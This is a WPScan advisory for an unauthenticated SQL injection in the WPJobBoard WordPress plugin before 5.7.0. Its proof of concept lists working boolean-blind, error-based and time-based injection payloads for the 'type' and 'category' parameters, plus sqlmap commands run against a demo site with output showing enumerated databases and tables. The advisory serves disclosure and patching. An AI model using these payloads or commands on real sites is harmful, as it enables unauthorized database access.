WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPJobBoard < 5.7.0 - Unauthenticated SQL Injection

Description

An Unauthenticated SQL Injection vulnerability was discovered in the WPJobBoard plugin v5.6.4 for WordPress.

Vulnerable parameters: type, category.

Proof of Concept

[$] :: Payloads (Boolean-based blind):

/advanced-search/?query=4325&location=4325&type=7)) AND 2392=(SELECT (CASE WHEN (2392=2392) THEN 2392 ELSE (SELECT 8365 UNION SELECT 6110) END))-- -&category=2&posted=30&results=1

/advanced-search/?query=4325&location=4325&type=7&category=2)) AND 5421=(SELECT (CASE WHEN (5421=5421) THEN 5421 ELSE (SELECT 5942 UNION SELECT 8466) END))-- -&posted=30&results=1


[$] :: Payloads (Error-based):

/advanced-search/?query=4325&location=4325&type=7)) AND EXTRACTVALUE(4031,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(4031=4031,1))),0x717a6a7171)) AND ((1099=1099&category=2&posted=30&results=1

/advanced-search/?query=4325&location=4325&type=7&category=2)) AND EXTRACTVALUE(5255,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(5255=5255,1))),0x717a6a7171)) AND ((5637=5637&posted=30&results=1


[$] :: Payloads (Time-based blind):

/advanced-search/?query=4325&location=4325&type=7)) AND SLEEP(5)#&category=2&posted=30&results=1
/advanced-search/?query=4325&location=4325&type=7&category=2)) AND SLEEP(5)#&posted=30&results=1

[!] :: PoC (SQLMap):

sqlmap --url="https://demo.wpjobboard.net/jobs/advanced-search/?query=4325&location=4325&type=7&category=2&posted=30&results=1" -dbs --user-agent=X --threads=2 --disable-precon --no-cast

[*] starting @ 15:47:39 /2020-10-24/

[15:47:39] [INFO] testing connection to the target URL
[15:47:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1 (Percona fork)
[15:47:45] [INFO] fetching database names
[15:47:47] [WARNING] reflective value(s) found and filtering out
[15:47:47] [WARNING] the SQL query provided does not return any output
[15:47:47] [INFO] fetching number of databases
[15:47:47] [INFO] resumed: 2
[15:47:47] [INFO] retrieving the length of query output
[15:47:47] [INFO] retrieved: 18
[15:49:10] [INFO] retrieved: information_schema
[15:49:10] [INFO] retrieving the length of query output
[15:49:10] [INFO] retrieved: 18
[15:50:31] [INFO] retrieved: simpliko_wpjb_demo
available databases [2]:
[*] information_schema
[REDACTED]

[*] ending @ 15:50:31 /2020-10-24/


sqlmap --url="https://demo.wpjobboard.net/jobs/advanced-search/?query=4325&location=4325&type=7&category=2&posted=30&results=1" -D REDACTED -tables --user-agent=X --threads=4 --disable-precon --no-cast

[*] starting @ 15:51:03 /2020-10-24/

[15:51:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1 (Percona fork)
[15:51:09] [INFO] fetching tables for database: 'REDACTED'
Database: REDACTED
[32 tables]
[REDACTED]

[*] ending @ 15:51:12 /2020-10-24/ 

Affects Plugins

wpjobboard
Fixed in version 5.7.0

References

URL
https://ex-mi.ru/exploit/[2020-10-24]-[WordPress]-wpjobboard-plugin-v5.6.4.txt

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website
https://ex-mi.ru
Verified

No

WPVDB ID
c0ec5f0c-5e66-48f2-87bc-56c6f0db1898

Timeline

Publicly Published

2020-11-25 (about 2 years ago)

Added

2020-11-25 (about 2 years ago)

Last Updated

2020-11-26 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us